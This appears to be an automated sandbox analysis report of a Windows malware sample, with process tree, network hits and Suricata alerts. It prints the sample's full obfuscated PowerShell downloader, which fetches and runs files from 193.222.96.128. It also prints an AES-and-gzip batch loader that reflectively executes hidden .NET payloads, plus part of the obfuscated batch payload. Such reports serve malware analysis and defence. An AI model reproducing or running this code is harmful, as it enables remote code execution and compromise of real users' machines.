Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | April 21, 2024, 12:44 p.m. | April 21, 2024, 12:46 p.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH;
2640-
notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\test22\AppData\Roaming\Note.txt
2812 -
-
-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); "
3052 -
powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
604
-
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
193.222.96.128 | Active | Moloch |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 193.222.96.128:7287 -> 192.168.56.101:49165 | 2400036 | ET DROP Spamhaus DROP Listed Traffic Inbound group 37 | Misc Attack |
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Roaming\15.bat |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH; |
cmdline | powershell.exe -ExecutionPolicy UnRestricted function gkzChlFZJJ($CLgcLN, $kmBiXxhdPBBuVK){[IO.File]::WriteAllBytes($CLgcLN, $kmBiXxhdPBBuVK)};function EHyqZyfXS($CLgcLN){if($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68399,68407,68407))) -eq $True){rundll32.exe $CLgcLN }elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68411,68414,68348))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CLgcLN}elseif($CLgcLN.EndsWith((wTbQxZaeCBFXfE @(68345,68408,68414,68404))) -eq $True){misexec /qn /i $CLgcLN}else{Start-Process $CLgcLN}};function EcjCVmfjLDzFvM($qDNhNUEOwgjE){$pXytQmYCtNpvKlmM = New-Object (wTbQxZaeCBFXfE @(68377,68400,68415,68345,68386,68400,68397,68366,68407,68404,68400,68409,68415));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kmBiXxhdPBBuVK = $pXytQmYCtNpvKlmM.DownloadData($qDNhNUEOwgjE);return $kmBiXxhdPBBuVK};function wTbQxZaeCBFXfE($IXRsdNnynXKLzp){$gCTQwIlSnN=68299;$gsScNSXbhsG=$Null;foreach($YPrbcjAFtcNCEhncu in $IXRsdNnynXKLzp){$gsScNSXbhsG+=[char]($YPrbcjAFtcNCEhncu-$gCTQwIlSnN)};return $gsScNSXbhsG};function odaqkEMluKlVzieGjH(){$nbpUYlNulSp = $env:AppData + '\';$cnysluAIEDXyIH = $nbpUYlNulSp + 'Note.txt';If(Test-Path -Path $cnysluAIEDXyIH){Invoke-Item $cnysluAIEDXyIH;}Else{ $nzWdArjtuUapYUy = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68377,68410,68415,68400,68345,68415,68419,68415));gkzChlFZJJ $cnysluAIEDXyIH $nzWdArjtuUapYUy;Invoke-Item $cnysluAIEDXyIH;};$iTWyAvaurQ = $nbpUYlNulSp + '15.bat'; if (Test-Path -Path $iTWyAvaurQ){EHyqZyfXS $iTWyAvaurQ;}Else{ $YiQQDI = EcjCVmfjLDzFvM (wTbQxZaeCBFXfE @(68403,68415,68415,68411,68357,68346,68346,68348,68356,68350,68345,68349,68349,68349,68345,68356,68353,68345,68348,68349,68355,68357,68354,68349,68355,68354,68346,68348,68352,68345,68397,68396,68415));gkzChlFZJJ $iTWyAvaurQ $YiQQDI;EHyqZyfXS $iTWyAvaurQ;};;;;}odaqkEMluKlVzieGjH; |
cmdline | C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\15.bat" |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UerdI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UerdI.Key=[System.Convert]::($MMJz[12])('dVsAn8RIciGbSq5PEUSffnRQiEF7D6JhJ+MhQGAxpxA=');$UerdI.IV=[System.Convert]::($MMJz[12])('rrMf8DdSiOTkJYW5AhOOlg==');$ytGVg=$UerdI.($MMJz[3])();$FTQFX=$ytGVg.($MMJz[10])($JKmLP,0,$JKmLP.Length);$ytGVg.Dispose();$UerdI.Dispose();$FTQFX;}function mpyCC($JKmLP){$FjjxJ=New-Object System.IO.MemoryStream(,$JKmLP);$sySFb=New-Object System.IO.MemoryStream;$Rdfpf=New-Object System.IO.Compression.GZipStream($FjjxJ,[IO.Compression.CompressionMode]::($MMJz[5]));$Rdfpf.($MMJz[7])($sySFb);$Rdfpf.Dispose();$FjjxJ.Dispose();$sySFb.Dispose();$sySFb.ToArray();}$BklLD=[System.IO.File]::($MMJz[8])([Console]::Title);$oNBKh=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 5).Substring(2))));$HuDRY=mpyCC (FBejp ([Convert]::($MMJz[12])([System.Linq.Enumerable]::($MMJz[2])($BklLD, 6).Substring(2))));[System.Reflection.Assembly]::($MMJz[13])([byte[]]$HuDRY).($MMJz[6]).($MMJz[9])($null,$null);[System.Reflection.Assembly]::($MMJz[13])([byte[]]$oNBKh).($MMJz[6]).($MMJz[9])($null,$null); " |
cmdline | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Data received | HTTP/1.1 200 OK |
Data received | Content-Length: 108 Content-Type: text/plain Connection:close ì볼루ì ë°°í ê²ìì´ë¦ ë°°í ë´ì íì°¨ ìê° ê¸ì¡ ê²°ê³¼ 미ì§ê¸ê¸ì¡ ì§ê¸ì ê¸ì¡ |
Data received | Content-Length: 62382 Content-Type: application/octet-stream Connection:close @echo off set "gwAVRA=seWiBDht aWiBDhPiBWiBDh=1WiBDh &WiBDh&WiBDh sWiBDhtaWiBDhrt WiBDh"WiBDh" WiBDh/mWiBDhinWiBDh WiBDh" set "CMXyhD=&WiBDh& eWiBDhxiWiBDhtWiBDh" set "pEXfDe=noWiBDht WiBDhdeWiBDhfWiBDhiWiBDhneWiBDhd aWiBDhPWiBDhiBWiBDh if %pEXfDe:WiBDh=% (%gwAVRA:WiBDh=%%0 %CMXyhD:WiBDh=%) ::TWUbjYZgF7jo9iEb+syJC0GZd6aI64tyS6zuALFPQcbUImjK73FfuAt8fmS3js4T93zJTaHEgjf/i8aI1/WVfhgpBMCwfZlari72/Isp1xfIyVmMxban1ZXpGV3ARbK6u1O7CFziLo4GZLejD5bD1za9+YChl2tNnztwnW8gNHHT7toY9mSDrP6If/bB/P/bYq5b4Q9M8tVt08uAj1opSh1ZkcGmfsBcH7T++uEBPDLIhoHdsUz0JUH7LxrPkrnnTjd6LgYH8iuzj+ypcAqtETlE/UxFzcWVHghyBOMFSNTMSdGYYyytIKcj88HPgmWga65kuUuCMDXWtPpGVOuWgRaFroKCRDkomCCWdD4cxfPCkffPjQEzJ1Eca41x3CX6NWlB0oSaVw5SixVVSG6YWK2x3xhQlbgJ6FHWtbncDVm1JWxeSkrjD9ZKdHnf8bEy2YPb3M4GJhWSPlklGGc14PgtYNz3o+5D4cpfse9z65B3jONRAYnP/qbHs49DOfBm6xFZIkvpMp/EJaTC2UD6b0165djkw6nEwS3Uh+utecRq2e7V0NO6ibjD63NLS9kyJ3izzpD69Z/R23laBpM15p7P5tumQoYckQrxTSDNgmP+cC81cFSW3q1rvD+y02vOdKCDn1KGlmAuzlACoLXGSBmu4NOqtNJMP/aJUpUgpzreKV1wtRWdUQ4vzFvIEA+rpf7eviNiBAt/DvrLaWKfZnjxKy4lpb4XlTGg+0eM2z0tEbvqafmzKfjUc3gwf4vnrF0kTvfVqix0CwSTn8VbhMzMtIR2cAofJjXVIAvImeh3bauepawbWPhXiygatACpYMiiIX/e3tPJotciBKnhNymtGjPdNcvVo2/laWvjbkqyuPUVIDApzb7ETZaPngOYV0NuKsWVuiRwjDohGOyZ+UqGCy7dzxbuTXUG7VjUtwEJQIlcRYXaAdJ37R1zfWnLZmryLQDk3qX0Nx/c0j8AN8oY9vkuQujhlWBNh05DCPREcr8y8xqmvTAAqrHT+VbgVcXb5uUtpASXOrHH4Q1tqGEL+RB2XYJ7aUMOTFlo4tJ0NoqoV37LOD7lsU0vlGpuRC9WJH7vElF8BpGQCuHAfpjaKZggvuRUPonbcW/Tk+KFVoZnnjfNmS6gqnfG7AvRIkVaubJ4ztVnmf6U8uC5pTXbX2NQge3uzPFr25G3zl/iRD1l4ksa8XCluw0Cu2HCBqPqvcS3PEKdjjnfoENGwxIOrTiuWtJZAQNoVA9suXFk/XgLOwtqxC1G0R5Bmyw1Yzbz9fm1ZVKfvXhadI/a0AxA1rR8VbEHxebT7497/HogUG2fu84SidcGSOpBv1Ob+joy459t1AjxzedvkRmTsNqwC/NTbWvmGg8T65C9DAzKp1/VRTClQS1qoOC/QpO99+Yipu10CL6QUn0NGxph+ZQJiv4NKo/Hxr8viM0ShpHmQeYO/XcqnOAgEhitjJPij4Uv7JTeaJnJAsZTCmRczXoLlCq6XNgDaJOy1L6hatIj5NlvDw7FvFkF9L5skutFoZ2H9sFFxVFUrPvzSLeol7en66UXpxt1+akRsAjpv61SgeeQOq4GfvnQh10G+1uYIt8p6VbFeyVVpM52lcKNK6t6/630Ay1d8Bg53Pq4mWoiE0zq1hS5Fkp1q7ekuVIBNovpvWTzoWC3yIot3vloEKZmF9RjK21JDg5lsUQMiR37btlms3NTz24KduSHjwbyrqEIlwYqCheK9ESbl7Q3C |
Data received | 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 |
Data received | 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 |
Data received | 2Q//QYZPr5DBJxg27n+1GXEIgynls0liny/DqMgKQpl4OrZUF+kZWFUkfdW7VegSn02e+STQ44IiMroQfPY2EYUOM8IhdqaQpGpWZRa6wTBv55eEfUmHt/0o5HG9OnYp+7CA+J1Zd+iC/9WfguAGELQn/QEvB1EXEcwMF1l+9MoRUnz+GUEvsBr73TKZv98JkgH41dDWehfjjNOGXH2h/z2Yx+pdT3Ys10Nv1pQdFLQgtUHRtz6pjzWD3vnT8Vcy8e4rHM1DLDcqxoIs0TQ34NK+XjNmr2InbYiLXn/uFbrk+y7ZhuztDoHiEZOtws7GDPtobUbh8hfeWLyhe7wZC4Wtgv+C5gMpomCIrFox2TzjCulofeILooqbGpU3L+4CLaFgNeZFsE9mZNxyeg2FPKORqaliUWR1y/2ZSp1KTTau0IKse+zXokRd+KblPbkxNBjWTTf2MB7iVwWDuXIZK6uAjZEV8WVX0GjXXFBH/tdIxJkiAOpNjfdHlo6tQgUuFdLBI9HfMdNPUaGyaeTA335fS07X8vHg/dVcc+Nkvat43naNp/6cchQfxQSxxVoAfKlTVq5jTZxGpppnns8N2tsEyFZgI7DcyItFCRGa14hsdJGd3c35OFIp2g3nhlAQug7VDtf5lDcBh3lAGmz0ZMecCtYcBFP026Ji3H8YueFp50ElW1hFx17SvdPVzsTfjp7kM+qA8tF8EWm0qhy0285gTiPXLg+3Rmw6gjHFuMX0thr56tklEvfq9/FTuBATvmjpgPSpjS1OozkBD+0Gyz/0tiRwuzqpXwrBNgdj9ZzUNLmzPCLvFw7DfGNxpysaH5na7Bjk0DIlXXbtGj/Ir2oFPpE8qnSV4+MOkArBZAx0hvTu1qaCGLS0lKo4QXDpRoCOYx6eAJzH+vj34fysN8saa22RDGd3AabjBx6mjcao+f2lR4c0AJlAiNCterbZnEaJWkPSrYvJi1R9h3LEZZolIV4iGOd13VO/F5JRokX7JJ612mIJD1QjNzrcIUZZIFUwhMYwc6QfvCVO4F1cduViAMVBCwrW5QdFPAkEPFK524m1bI7UH++Q9D1370kh/wdowkm4giCi32gaKj4wncozVMFUVS4zFsdJ+dx98+Y/O49P401AbtSD5y9+2V1QgK/xMcw2eZS7IDuIGqmFo5s8/jWj6+yusKQaS/utInKKe2c7KmAK9IJp0W+FSzF6868IOAtqzXv1OTDs2WUg0z5rsJQvbWJxSd/IUu8GLXj37T/S7p3cM2JbNavzX2dSZULZhv46SnFRsl6mOlERCGBMOOGOmrhx7Hc/4b2aSLsf9CItcqiudRXNoDRSj6MXU/oW20VLwF9TLp98Q8RxtnXyrnFW963eZD5Tts7zpaZ8HZ1EfHQpiB0DEWCyijy/RZ+p3ffn1ZfvL0V5KDGijq